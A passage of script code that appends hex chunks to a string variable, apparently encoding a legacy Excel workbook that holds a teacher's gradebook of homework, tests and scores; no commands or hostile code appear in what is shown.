c006fd000a000"\r\nwD+="30008001c0029000000fd000a00040000000f0004000000fd000a00040001000f000a000000"\r\nwD+="7e020a00040002000f000000594003020e00040008001d0014b742712b145140fd000a00050"\r\nwD+="000000f0005000000fd000a00050001000f000b0000007e020a00050002000f0000004940fd"\r\nwD+="000a00050008001c0029000000fd000a00060000000f0006000000fd000a00060001000f000"\r\nwD+="9000000bd001200060002000f0000c050400f0000005140030003020e00060006000f004304"\r\nwD+="1c42957a464006002800060007000f0037f4c8e6e7c696bf0000030007ff120044060002c04"\r\nwD+="4060003c0041544060006c0067e020a00060008001d0000805140fd000a00070000000f0007"\r\nwD+="000000fd000a00070001000f0009000000bd001200070002000f000104bf400f00000051400"\r\nwD+="30003020e00070006000f0043041c42957a464006002800070007000f006994d53a853ad03f"\r\nwD+="0000060007ff120044070002c044070003c0041544070006c006fd000a00080000000f00080"\r\nwD+="00000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a00090000"\r\nwD+="000f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000"\r\nwD+="a000a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f000080"\r\nwD+="5140fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b00020"\r\nwD+="00f0000005940fd000a000c0000000f000f000000fd000a000c0001000f0009000000bd0012"\r\nwD+="000c0002000f00000059400f0000005140030003020e000c0006000f0043041c42957a46400"\r\nwD+="60028000c0007000f0037f4c8e6e7c6e63f0000070007ff1200440c0002c0440c0003c00415"\r\nwD+="440c0006c006fd000a000d0000000f0023000000fd000a000d0001000f000a0000007e020a0"\r\nwD+="00d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f000a0000"\r\nwD+="007e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000f0001000"\r\nwD+="f000a0000007e020a000f0002000f0000004940fd000a00100000000f0013000000fd000a00"\r\nwD+="100001000f000a0000007e020a00100002000f0000003440fd000a00110000000f001400000"\r\nwD+="0fd000a00110001000f000c0000007e020a00110002000f0000c05240fd000a00120000000f"\r\nwD+="0015000000fd000a00120001000f0009000000bd001200120002000f00000059400f0000005"\r\nwD+="140030003020e00120006000f0043041c42957a464006002800120007000f0037f4c8e6e7c6"\r\nwD+="e63f00000c0007ff120044120002c044120003c0041544120006c006fd000a0012000800200"\r\nwD+="026000000fd000a001200090020002a000000fd000a00130000000f0016000000fd000a0013"\r\nwD+="0001000f0009000000bd001200130002000f00000000000f0000005140030003020e0013000"\r\nwD+="6000f0043041c42957a464006002800130007000f007a8335655633f8bf0000120007ff1200"\r\nwD+="44130002c044130003c0041544130006c006060023001300080027006766666666663440000"\r\nwD+="0030003ff0d001fc3f5285c8fc2e53f1e1e00057e020a0013000900200000003e40fd000a00"\r\nwD+="140000000f0017000000fd000a00140001000f0009000000bd001200140002000f000000000"\r\nwD+="00f0000005140030003020e00140006000f0043041c42957a464006002800140007000f007a"\r\nwD+="8335655633f8bf0000130007ff120044140002c044140003c0041544140006c006fd000a001"\r\nwD+="50000000f0018000000fd000a00150001000f000a0000007e020a00150002000f0000005940"\r\nwD+="fd000a00160000000f0019000000fd000a00160001000f000a0000007e020a00160002000f0"\r\nwD+="000005440fd000a00170000000f001a000000fd000a00170001000f0009000000bd00120017"\r\nwD+="0002000f00000059400f0000005140030003020e00170006000f0043041c42957a464006002"\r\nwD+="800170007000f0037f4c8e6e7c6e63f0000140007ff120044170002c044170003c004154417"\r\nwD+="0006c006fd000a00180000000f001b000000fd000a00180001000f0009000000bd001200180"\r\nwD+="002000f00000000000f0000005140030003020e00180006000f0043041c42957a4640060028"\r\nwD+="00180007000f007a8335655633f8bf0000170007ff120044180002c044180003c0041544180"\r\nwD+="006c006fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a001900"\r\nwD+="02000f0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e0"\r\nwD+="20a001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c"\r\nwD+="0000007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000"\r\nwD+="1000f0009000000bd0012001c0002000f00000059400f0000005140030003020e001c000600"\r\nwD+="0f0043041c42957a4640060028001c0007000f0037f4c8e6e7c6e63f0000180007ff1200441"\r\nwD+="c0002c0441c0003c00415441c0006c006fd000a001d0000000f001f000000fd000a001d0001"\r\nwD+="000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f0020000000fd000"\r\nwD+="a001e0001000f0009000000bd0012001e0002000f00000059400f0000005140030003020e00"\r\nwD+="1e0006000f0043041c42957a4640060028001e0007000f0037f4c8e6e7c6e63f00001c0007f"\r\nwD+="e1200441e0002c0441e0003c00415441e0006c006fd000a001f0000000f001e000000fd000a"\r\nwD+="001f0001000f000a0000007e020a001f0002000f0000805640d7004200ac0c0000580270003"\r\nwD+="c00c1013c0038007e0070002a002a002a002a0070002a002a002a002a002a008c00a5007000"\r\nwD+="2a002a00700070002a002a002a0070002a0070000802100029000e000f00ff0000000000000"\r\nwD+="10f00080210002a000e000f00ff000000000000010f000102060029000e001700010206002a"\r\nwD+="000e001700d70008003c00000014000a00c2011800110003000100090803000080040013000"\r\nwD+="2000903080007feec00aa000f0002f014010000300008f00800000003000000030800000f00"\r\nwD+="03f0fc0000000f0004f028000000010009f0100000000000000000000000000000000000000"\r\nwD+="002000af00800000000080000050000000f0004f052000000920c0af0080000000108000000"\r\nwD+="0a000043000bf0180000007f0004010401bf0008000800ff0100000800bf030000020000001"\r\nwD+="0f012000000010001000000010000000200000002000000000011f0000000005d0046001500"\r\nwD+="120014000100012100000000ac199201000000000c001400000000000000000000000100080"\r\nwD+="00000100000001300ee1f000008000500010300000a001400570000000000ec0072000f0004"\r\nwD+="f06a000000920c0af00800000003080000000a000083000bf0300000007f0004010401bf000"\r\nwD+="800080081014e00000883014d000008bf0110001000c0014d000008ff01080008003f020000"\r\nwD+="0200000010f0120000000000000097002200c4000d00b0013b009700000011f0000000005d0"\r\nwD+="01a001500120005000300116000000000781a920100000000000000000908100000062000e2"\r\nwD+="28cd07c9c00000060200001400000015000000830002000000840002000000a100220000001"\r\nwD+="20001000100010004000000781a000000000000e03f000000000000e03f7f00330002000300"\r\nwD+="60100a004c1d4812dc0001000c0060100a008115e60ac80000000d0060100a008115e60ac80"\r\nwD+="001000e00120002000100011002000000021010000000000000000000e8bfa60200403d0133"\r\nwD+="100000a00004000100010064100800000001000000010032100400000002003310000007100"\r\nwD+="c00000000000000ffff09004d000a101000ffffff0000000000010001004e004d0034100000"\r\nwD+="03100c00030001000b000b00010000003310000051100f0000020000000007003a010001000"\r\nwD+="2000d100e000000050147005200410044004500511013000102000000000b003b010002001e"\r\nwD+="0002000200511013000202000000000b003b010002001e00000001005110080003010000000"\r\nwD+="0000006100800ffff000000000000331000005f100200000034100000451002000000341000"\r\nwD+="00441004001a000000241002000200251020000202010000000000eaffffffd0ffffff00000"\r\nwD+="00000000000b1004d00103d0000331000004f10140002000200000000000000000000000000"\r\nwD+="00000000261002000d005110080000010000000000003410000024100200030025102000020"\r\nwD+="2010000000000eaffffffd0ffffff0000000000000000b1004d00103d0000331000004f1014"\r\nwD+="000200020000000000000000000000000000000000261002000e00511008000001000000000"\r\nwD+="00034100000461002000100411012000000a3020000f9030000200a0000bb04000033100000"\r\nwD+="4f101400020002002d000000fb020000960c0000440c00001d1012000000000000000000000"\r\nwD+="000000000000000003310000020100800010001000100010062101200000000000100000001"\r\nwD+="00000000000000ef001e101e000200030100000000000000000000000000000000000000000"\r\nwD+="3004d002900261002000c00341000001d101200010000000000000000000000000000000000"\r\nwD+="331000001f102a0000000000000000000000000000000000000000000000000000000000000"\r\nwD+="0000000000000000000001f011e101e00020003010000000000000000000000000000000000"\r\nwD+="00000023004d00000021100200010007100c00000000000000ffff09004d003410000035100"\r\nwD+="00032100400000003003310000007100c008080800000000000000017000a101000c0c0c000"\r\nwD+="000000000100000016004f00341000001410140000000000000000000000000000000000000"\r\nwD+="00000331000001710060000009600000022100a0000000000000000000f0015101400f40c00"\r\nwD+="00b20600009a0200009701000003011f00331000004f10140005000200f40c0000af0600000"\r\nwD+="000000000000000251020000202010000000000eaffffffd0ffffff0000000000000000b100"\r\nwD+="4d0030090000331000004f10140002000200000000000000000000000000000000005110080"\r\nwD+="000010000000000003410000034100000341000003410000025102000020201000000000095"\r\nwD+="0600006b000000a3020000f801000081004d008a300000331000004f1014000200020018000"\r\nwD+="0001a0000009700000034000000261002000d005110080000010000000000000d1014000000"\r\nwD+="080148006f006d00650077006f0072006b00271006000100000000003410000034100000000"\r\nwD+="20e00000000000b000000000001000000651002000200040235000000000000001600013100"\r\nwD+="2f00320039002c00200033003000200050002e0020003400390032002c00200050002000350"\r\nwD+="03000320004022f0001000000000013000131002f0033003100200032002f00310020004300"\r\nwD+="68002000540065007300740020004100200004022d0002000000000012000132002f0031002"\r\nwD+="c003200200070002e00200035003100360020002d0020003500310038000402270003000000"\r\nwD+="00000f0001700072006f006a0065006300740020006f00750074006c0069006e00650004023"\r\nwD+="10004000000000014000132002f0036002c0020003700200070002e00200037003900390020"\r\nwD+="00230031002d003200350020000402290005000000000010000170002e00200035003300310"\r\nwD+="02000350033003800200032002f0038002c0039000402370006000000000017000139002e00"\r\nwD+="3300200039002e00340020007000790074006800610067006f007200650061006e002000740"\r\nwD+="068006d0004022f0007000000000013000132002f00320037002c003200380020004d006100"\r\nwD+="7400680020004100200074006500730074000402330008000000000015000133002f0031002"\r\nwD+="c003200200077006b007300680074002000310030002e0031002f00310030002e0036000402"\r\nwD+="21000900000000000c00016c006f0063007500730020007000610063006b006500740004024"\r\nwD+="7000a00000000001f000133002f0037002c0038002000310031002e00310020006e006f0074"\r\nwD+="0065007300200061006e0064002000700072006100630020004100200073006800740065100"\r\nwD+="200010003020e00000000000000000000000040594003020e000100000000000000000000c0"\r\nwD+="504003020e000200000000009a99999999d9534003020e00030000000000000000000000594"\r\nwD+="003020e00040000000000000000000000594003020e00050000000000000000000000000003"\r\nwD+="020e00060000000000000000000000000003020e00070000000000000000000000594003020"\r\nwD+="e00080000000000000000000000000003020e00090000000000000000000000594003020e00"\r\nwD+="0a000000000000000000000059406510020003000a0000003e021200b600030000004000000"\r\nwD+="000000000000000001d000f00030300030000000100030003000303ef000600050037000000"\r\nwD+="67081700670800000000000000000000020001ffffffff004000000a0000000908100000061"\r\nwD+="000e228cd07c9c00000060200000b021800000000000100000025000000d05800004d610000"\r\nwD+="076200000d00020001000c00020064000f000200010011000200000010000800fca9f1d24d6"\r\nwD+="2503f5f00020001002a00020000002b00020000008200020001008000080000000000000000"\r\nwD+="00250204000000ff0081000200c1041400000015000000830002000000840002000000a1002"\r\nwD+="2000000ff000100010001000400020001ff000000000000e03f000000000000e03f006f5500"\r\nwD+="020008007d000c0000000000db1f0f00020004007d000c00010001006d0b0f00020004009b0"\r\nwD+="000009d00020001009e001d00000004000602d85a3601040100000000000000000000000000"\r\nwD+="7175697a00020e00010000002500000000000900000008021000010000000900ff000000000"\r\nwD+="000010f0008021000020000000900ff000000000020010f0008021000030000000900ff0000"\r\nwD+="00000020010f0008021000040000000900ff000000000020010f0008021000050000000900f"\r\nwD+="f000000000000010f0008021000060000000900ff000000000020010f000802100007000000"\r\nwD+="0900ff000000000020010f0008021000080000000900ff000000000020010f0008021000090"\r\nwD+="000000900ff000000000000010f00080210000a0000000900ff000000000020010f00080210"\r\nwD+="000b0000000900ff000000000000010f00080210000c0000000900ff000000000020010f000"\r\nwD+="80210000d0000000900ff000000000020010f00080210000e0000000900ff00000000002001"\r\nwD+="0f00080210000f0000000900ff000000000020010f0008021000100000000300ff000000000"\r\nwD+="020010f0008021000110000000300ff000000000020010f0008021000120000000300ff0000"\r\nwD+="00000020010f0008021000130000000300ff000000000020010f0008021000140000000300f"\r\nwD+="f000000000020010f0008021000150000000300ff000000000020010f000802100016000000"\r\nwD+="0300ff000000000020010f0008021000170000000300ff000000000020010f0008021000180"\r\nwD+="000000300ff000000000020010f0008021000190000000300ff000000000020010f00080210"\r\nwD+="001a0000000300ff000000000020010f00080210001b0000000300ff000000000020010f000"\r\nwD+="80210001c0000000300ff000000000020010f00080210001d0000000300ff00000000000001"\r\nwD+="0f00080210001e0000000300ff000000000020010f00080210001f0000000300ff000000000"\r\nwD+="020010f00fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a0001"\r\nwD+="0002000f0002000000fd000a00010003000f0047000000fd000a00010004000f0032000000f"\r\nwD+="d000a00010005000f0048000000fd000a00010006000f004d000000fd000a00010007000f00"\r\nwD+="4e000000fd000a00010008000f0029000000fd000a00020000000f0021000000fd000a00020"\r\nwD+="001000f00220000007e020a00020002000f0000005940fd000a00030000000f0003000000fd"\r\nwD+="000a00030001000f00090000007e020a00030002000f0000005940fd000a00040000000f000"\r\nwD+="4000000fd000a00040001000f000a0000007e020a00040002000f0000005940fd000a000500"\r\nwD+="00000f0005000000fd000a00050001000f000b0000007e020a00050002000f0000004940060"\r\nwD+="02e00050003000f000000000000e050400000b80b37fc180024050002c024090002c0240b00"\r\nwD+="02c0241d0002c042040500fd000a00060000000f0006000000fd000a00060001000f0009000"\r\nwD+="0007e020a00060002000f0000c0504003020e0006000700170014b742712b145140fd000a00"\r\nwD+="070000000f0007000000fd000a00070001000f00090000007e020a00070002000f000000444"\r\nwD+="0fd000a00080000000f0008000000fd000a00080001000f000c0000007e020a00080002000f"\r\nwD+="0000004940fd000a00090000000f000d000000fd000a00090001000f000b0000007e020a000"\r\nwD+="90002000f0000005440fd000a000a0000000f000e000000fd000a000a0001000f000c000000"\r\nwD+="7e020a000a0002000f0000805140fd000a000b0000000f0011000000fd000a000b0001000f0"\r\nwD+="00b0000007e020a000b0002000f0000005940fd000a000c0000000f000f000000fd000a000c"\r\nwD+="0001000f00090000007e020a000c0002000f0000005940fd000a000d0000000f0023000000f"\r\nwD+="d000a000d0001000f000a0000007e020a000d0002000f0000003440fd000a000e0000000f00"\r\nwD+="10000000fd000a000e0001000f000a0000007e020a000e0002000f0000004940fd000a000f0"\r\nwD+="000000f0012000000fd000a000f0001000f000a0000007e020a000f0002000f0000004940fd"\r\nwD+="000a00100000000f0013000000fd000a00100001000f000a0000007e020a00100002000f000"\r\nwD+="0003440fd000a00110000000f0014000000fd000a00110001000f000c0000007e020a001100"\r\nwD+="02000f0000c05240fd000a00120000000f0015000000fd000a00120001000f00090000007e0"\r\nwD+="20a00120002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009"\r\nwD+="0000007e020a00130002000f0000000000fd000a00140000000f0017000000fd000a0014000"\r\nwD+="1000f00090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd00"\r\nwD+="0a00150001000f000a0000007e020a00150002000f0000005940fd000a00160000000f00190"\r\nwD+="00000fd000a00160001000f000a0000007e020a00160002000f0000005440fd000a00170000"\r\nwD+="000f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000"\r\nwD+="a00180000000f001b000000fd000a00180001000f00090000007e020a00180002000f000000"\r\nwD+="0000fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a001900020"\r\nwD+="00f0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a"\r\nwD+="001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000"\r\nwD+="0007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000100"\r\nwD+="0f00090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a0"\r\nwD+="01d0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f00200000"\r\nwD+="00fd000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000"\r\nwD+="f001e000000fd000a001f0001000f000a0000007e020a001f0002000f0000805640d7004200"\r\nwD+="1a08000058027e002a002a002a005c003c002a002a002a002a002a002a002a002a002a002a0"\r\nwD+="02a002a002a002a002a002a002a002a002a002a002a002a002a002a00080210002200000007"\r\nwD+="00ff000000000000010f0008021000230000000700ff000000000000010f000802100024000"\r\nwD+="0000700ff000000000000010f00fd000a00220002000f0037000000fd000a00220006000f00"\r\nwD+="2a0000007e020a00230006000f0000003440fd000a0024000000210038000000d7000a00740"\r\nwD+="0000028001c000e00c2010c00030005000300090303003800ec00aa000f0002f03a01000040"\r\nwD+="0008f00800000003000000020c00000f0003f00a0100000f0004f028000000010009f010000"\r\nwD+="0000000000000000000000000000000000002000af008000000000c0000050000000f0004f0"\r\nwD+="52000000920c0af008000000010c0000000a000043000bf0180000007f0004010401bf00080"\r\nwD+="00800ff0100000800bf0300000200000010f012000000010001000000010000000200000002"\r\nwD+="000000000011f0000000005d0046001500120014000100012100000000441d9201000000000"\r\nwD+="c00140000000000000000000000010008000000100000001300ee1f00000800070001030000"\r\nwD+="0a001400570000000000ec0078000f0004f078000000f2030af008000000020c0000000a000"\r\nwD+="093000bf0360000008000a86e36018500010000008b0002000000bf0008000a004701ae5900"\r\nwD+="004801cffaffff810141000008c001400000087f0300000c00000010f012000000000000005"\r\nwD+="2032300d300020090022700a600000011f0000000005d001a00150012001e0002001160a86e"\r\nwD+="3601a01d92010000000000000000ec00080000000df000000000b6011200120200000000000"\r\nwD+="0000022001000000000003c00230000496e73657274207765696768746564207175697a2061"\r\nwD+="76657261676520686572652e3c00100000001100c400110022000000ac9c3400ec0018001f0"\r\nwD+="005f010000000000017f00800000002000000020c00003e021200b600000000004000000000"\r\nwD+="000000000000001d000f00032700050000000100270027000505ef0006000500370000000a0"\r\nwD+="000000908100000061000e228cd07c9c00000060200000b0218000000000001000000270000"\r\nwD+="0027650000896d00005f6e00000d00020001000c00020064000f00020001001100020000001"\r\nwD+="0000800fca9f1d24d62503f5f00020001002a00020000002b00020000008200020001008000"\r\nwD+="08000000000000000000250204000000ff0081000200c104140000001500000083000200000"\r\nwD+="0840002000000a10022000000ff00010001000100040100050505000000000000e03f000000"\r\nwD+="000000e03f72655500020008007d000c0000000000db1f0f00020004017d000c00010001006"\r\nwD+="d0b0f00020004019b0000009d00020001009e001d00000004000602046e3601040100000000"\r\nwD+="0000000000000000007465737400020e0001000000270000000000080000000802100001000"\r\nwD+="0000800ff000000000000010f0008021000020000000800ff000000000020010f0008021000"\r\nwD+="030000000800ff000000000020010f0008021000040000000800ff000000000020010f00080"\r\nwD+="21000050000000800ff000000000020010f0008021000060000000800ff000000000020010f"\r\nwD+="0008021000070000000800ff000000000020010f0008021000080000000800ff00000000000"\r\nwD+="0010f0008021000090000000800ff000000000020010f00080210000a0000000800ff000000"\r\nwD+="000000010f00080210000b0000000800ff000000000020010f00080210000c0000000800ff0"\r\nwD+="00000000020010f00080210000d0000000800ff000000000020010f00080210000e00000008"\r\nwD+="00ff000000000020010f00080210000f0000000800ff000000000020010f000802100010000"\r\nwD+="0000300ff000000000020010f0008021000110000000300ff000000000000010f0008021000"\r\nwD+="120000000300ff000000000020010f0008021000130000000300ff000000000020010f00080"\r\nwD+="21000140000000300ff000000000020010f0008021000150000000300ff000000000020010f"\r\nwD+="0008021000160000000300ff000000000020010f0008021000170000000300ff00000000002"\r\nwD+="0010f0008021000180000000300ff000000000020010f0008021000190000000300ff000000"\r\nwD+="000020010f00080210001a0000000300ff000000000000010f00080210001b0000000300ff0"\r\nwD+="00000000000010f00080210001c0000000300ff000000000020010f00080210001d00000003"\r\nwD+="00ff000000000020010f00080210001e0000000300ff000000000020010f00080210001f000"\r\nwD+="0000300ff000000000020010f00fd000a00010000000f0000000000fd000a00010001000f00"\r\nwD+="01000000fd000a00010002000f0002000000fd000a00010003000f0047000000fd000a00010"\r\nwD+="004000f004f000000fd000a00010005000f0048000000fd000a00010006000f004d000000fd"\r\nwD+="000a00010007000f004e000000fd000a00020000000f0021000000fd000a00020001000f002"\r\nwD+="20000007e020a00020002000f0000005940fd000a00030000000f0003000000fd000a000300"\r\nwD+="01000f00090000007e020a00030002000f0000005940fd000a00040000000f0004000000fd0"\r\nwD+="00a00040001000f000a0000007e020a00040002000f0000005940fd000a00050000000f0005"\r\nwD+="000000fd000a00050001000f000b0000007e020a00050002000f0000004940fd000a0006000"\r\nwD+="0000f0006000000fd000a00060001000f00090000007e020a00060002000f0000c05040fd00"\r\nwD+="0a00070000000f0007000000fd000a00070001000f00090000007e020a00070002000f00000"\r\nwD+="04440fd000a00080000000f0008000000fd000a00080001000f000c0000007e020a00080002"\r\nwD+="000f000000494006003300080003000f000000000000c051400000f00b37fc1d0024080002c"\r\nwD+="0240a0002c024110002c0241a0002c0241b0002c042050500fd000a00090000000f000d0000"\r\nwD+="00fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a000a0000000"\r\nwD+="f000e000000fd000a000a0001000f000c0000007e020a000a0002000f0000805140fd000a00"\r\nwD+="0b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000f000000594"\r\nwD+="0fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a000c0002000f"\r\nwD+="0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a0000007e020a000"\r\nwD+="d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f000a000000"\r\nwD+="7e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000f0001000f0"\r\nwD+="00a0000007e020a000f0002000f0000004940fd000a00100000000f0013000000fd000a0010"\r\nwD+="0001000f000a0000007e020a00100002000f0000003440fd000a00110000000f0014000000f"\r\nwD+="d000a00110001000f000c0000007e020a00110002000f0000c05240fd000a00120000000f00"\r\nwD+="15000000fd000a00120001000f00090000007e020a00120002000f0000005940fd000a00130"\r\nwD+="000000f0016000000fd000a00130001000f00090000007e020a00130002000f0000000000fd"\r\nwD+="000a00140000000f0017000000fd000a00140001000f00090000007e020a00140002000f000"\r\nwD+="0000000fd000a00150000000f0018000000fd000a00150001000f000a0000007e020a001500"\r\nwD+="02000f0000005940fd000a00160000000f0019000000fd000a00160001000f000a0000007e0"\r\nwD+="20a00160002000f0000005440fd000a00170000000f001a000000fd000a00170001000f0009"\r\nwD+="0000007e020a00170002000f0000005940fd000a00180000000f001b000000fd000a0018000"\r\nwD+="1000f00090000007e020a00180002000f0000000000fd000a00190000000f001c000000fd00"\r\nwD+="0a00190001000f000a0000007e020a00190002000f0000000000fd000a001a0000000f001d0"\r\nwD+="00000fd000a001a0001000f000c0000007e020a001a0002000f0000005440fd000a001b0000"\r\nwD+="000f001d000000fd000a001b0001000f000c0000007e020a001b0002000f0000005440fd000"\r\nwD+="a001c0000000f001e000000fd000a001c0001000f00090000007e020a001c0002000f000000"\r\nwD+="5940fd000a001d0000000f001f000000fd000a001d0001000f000b0000007e020a001d00020"\r\nwD+="00f0000004440fd000a001e0000000f0020000000fd000a001e0001000f00090000007e020a"\r\nwD+="001e0002000f0000005940fd000a001f0000000f001e000000fd000a001f0001000f000a000"\r\nwD+="0007e020a001f0002000f0000805640d7004200ff070000580270002a002a002a002a002a00"\r\nwD+="2a0061002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a0"\r\nwD+="02a002a002a002a002a0008021000220000000300ff000000000000010f0008021000230000"\r\nwD+="000300ff000000000000010f0008021000260000000300ff000000000000010f00fd000a002"\r\nwD+="2000000210039000000fd000a00220001000f003a000000fd000a00220002000f002a000000"\r\nwD+="fd000a00230001000f003b0000007e020a00230002000f0000003440fd000a00260001000f0"\r\nwD+="046000000d7000a009000000028002a001c00c2010c00050008000400090303004600ec00aa"\r\nwD+="000f0002f0a2000000500008f00800000002000000011000000f0003f08a0000000f0004f02"\r\nwD+="8000000010009f0100000000000000000000000000000000000000002000af0080000000010"\r\nwD+="0000050000000f0004f052000000920c0af00800000001100000000a000043000bf01800000"\r\nwD+="07f0004010401bf0008000800ff0100000800bf0300000200000010f0120000000100010000"\r\nwD+="00010000000200000002000000000011f0000000005d0046001500120014000100012100000"\r\nwD+="0005c229201000000000c00140000000000000000000000010008000000100000001300ee1f"\r\nwD+="000008000800010300000a0014005700000000003e021200b60000000000400000000000000"\r\nwD+="0000000001d000f00032600010000000100260026000101ef0006000500370000000a000000"\r\nwD+="0908100000061000e228cd07c9c00000060200000b021400000000000000000020000000d67"\r\nwD+="30000d97900000d00020001000c00020064000f000200010011000200000010000800fca9f1"\r\nwD+="d24d62503f5f00020001002a00020000002b000200000082000200010080000800000000000"\r\nwD+="0000000250204000000ff0081000200c1041400000015000000830002000000840002000000"\r\nwD+="4d006a0300004500700073006f006e0020005300740079006c0075007300200043004f004c0"\r\nwD+="04f005200200036003000300020004500530043002f005000200032000000000001040005dc"\r\nwD+="008c0243ef800701000100ea0a6f08640001000f006801020001006801020001004c0065007"\r\nwD+="400740065007200000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000010"\r\nwD+="000000000000002000000020000000100000030010000000000000000000000000000000000"\r\nwD+="0044494e55220000003402580053ab1e3f00000000000000000000000001000000000000000"\r\nwD+="000000000000000080000000100000001000000000002000000040000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="00000580000004f535045414182820200000000000000010000000000000000000000000000"\r\nwD+="0000000000010000000000000004000000000000000000000000000000000000006a0000000"\r\nwD+="000000003000000010000000f000000a1002200010064000100010001000200680168010000"\r\nwD+="00000000e03f000000000000e03f010055000200080000020e0000000000200000000000050"\r\nwD+="0000008021000000000000500ff000000000000010f0008021000010000000500ff00000000"\r\nwD+="0000010f0008021000020000000500ff000000000000010f0008021000030000000500ff000"\r\nwD+="000000000010f0008021000040000000500ff000000000000010f0008021000050000000500"\r\nwD+="ff000000000000010f0008021000060000000500ff000000000000010f00080210000700000"\r\nwD+="00500ff000000000000010f0008021000080000000500ff000000000000010f000802100009"\r\nwD+="0000000500ff000000000000010f00080210000a0000000500ff000000000000010f0008021"\r\nwD+="0000b0000000500ff000000000000010f00080210000c0000000500ff000000000000010f00"\r\nwD+="080210000d0000000500ff000000000000010f00080210000e0000000500ff0000000000000"\r\nwD+="10f00080210000f0000000500ff000000000000010f0008021000100000000200ff00000000"\r\nwD+="0000010f0008021000110000000200ff000000000000010f0008021000120000000200ff000"\r\nwD+="000000000010f0008021000130000000200ff000000000000010f0008021000140000000200"\r\nwD+="ff000000000000010f0008021000150000000200ff000000000000010f00080210001600000"\r\nwD+="00200ff000000000000010f0008021000170000000200ff000000000000010f000802100018"\r\nwD+="0000000200ff000000000000010f0008021000190000000200ff000000000000010f0008021"\r\nwD+="0001a0000000200ff000000000000010f00080210001b0000000200ff000000000000010f00"\r\nwD+="080210001c0000000200ff000000000000010f00080210001d0000000200ff0000000000000"\r\nwD+="10f00080210001e0000000200ff000000000000010f00080210001f0000000200ff00000000"\r\nwD+="0000010f00fd000a00000000000f002e000000fd000a00010000000f002d000000fd000a000"\r\nwD+="10001000f002c000000fd000a00010003000f0032000000bd001200020000000f000000f03f"\r\nwD+="0f00000049400100bd001200030000000f00000000400f00000045400100fd000a000300040"\r\nwD+="00f002f000000bd001200040000000f00000008400f00000000400100060023000400040017"\r\nwD+="004444444444844b4000002c0c37fd0d002502001f0001c001c042010500bd0012000500000"\r\nwD+="00f00000010400f0000002a400100bd001200060000000f00000014400f00000050400100bd"\r\nwD+="001200070000000f00000018400f00000052400100bd001200080000000f0000001c400f000"\r\nwD+="08056400100fd000a00080004000f0030000000bd001200090000000f00000020400f000000"\r\nwD+="5440010006002300090004000f0000000000000050400000040004ff0d002502001f0001c00"\r\nwD+="1c04201e300bd0012000a0000000f00000022400f00000044400100bd0012000b0000000f00"\r\nwD+="000024400f00008056400100bd0012000c0000000f00000026400f00000039400100bd00120"\r\nwD+="00d0000000f00000028400f00000041400100fd000a000d0004000f0031000000bd0012000e"\r\nwD+="0000000f0000002a400f0000c055400100060023000e0004000f00000000000000504000000"\r\nwD+="90004fe0d006502001f0001c001c042014a01bd0012000f0000000f0000002c400f00004050"\r\nwD+="400100bd001200100000000f0000002e400f00004053400100bd001200110000000f0000003"\r\nwD+="0400f00008053400100bd001200120000000f00000031400f00000049400100bd0012001300"\r\nwD+="00000f00000032400f00000000000100bd001200140000000f00000033400f0000005040010"\r\nwD+="0bd001200150000000f00000034400f00008047400100bd001200160000000f00000035400f"\r\nwD+="00000050400100bd001200170000000f00000036400f00000049400100bd001200180000000"\r\nwD+="f00000037400f00004050400100bd001200190000000f00000038400f00000042400100bd00"\r\nwD+="12001a0000000f00000039400f0000004c400100bd0012001b0000000f0000003a400f00000"\r\nwD+="050400100bd0012001c0000000f0000003b400f0000c050400100bd0012001d0000000f0000"\r\nwD+="003c400f00000037400100bd0012001e0000000f0000003d400f0000c052400100bd0012001"\r\nwD+="f0000000f0000003e400f00004054400100d7004400eb0500006c020e002a00160024003d00"\r\nwD+="16001600160024003d0016001600160024003d0016001600160016001600160016001600160"\r\nwD+="01600160016001600160016001600c2010c0009000e000600090404000000ec00c8000f0002"\r\nwD+="f036020000600008f00800000005000000051800000f0003f0060200000f0004f0280000000"\r\nwD+="10009f0100000000000000000000000000000000000000002000af008000000001800000